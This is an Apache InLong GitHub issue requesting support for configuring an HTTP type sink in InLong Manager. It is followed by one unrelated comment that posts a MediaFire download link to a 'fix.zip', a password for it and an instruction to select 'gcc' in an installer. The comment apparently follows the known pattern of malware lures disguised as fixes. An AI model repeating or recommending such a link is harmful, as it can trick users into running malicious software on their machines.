### ISSUE TITLE
[Improve][Manager] Support configuring HTTP type sink

### ISSUE THREAD

**Issue by fuweng11** [apache/inlong#10884]
### Description

 Support configuring HTTP type sink.

### InLong Component

InLong Manager

### Are you willing to submit PR?

- [X] Yes, I am willing to submit a PR!

### Code of Conduct

- [X] I agree to follow this project's [Code of Conduct](https://www.apache.org/foundation/policies/conduct)

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
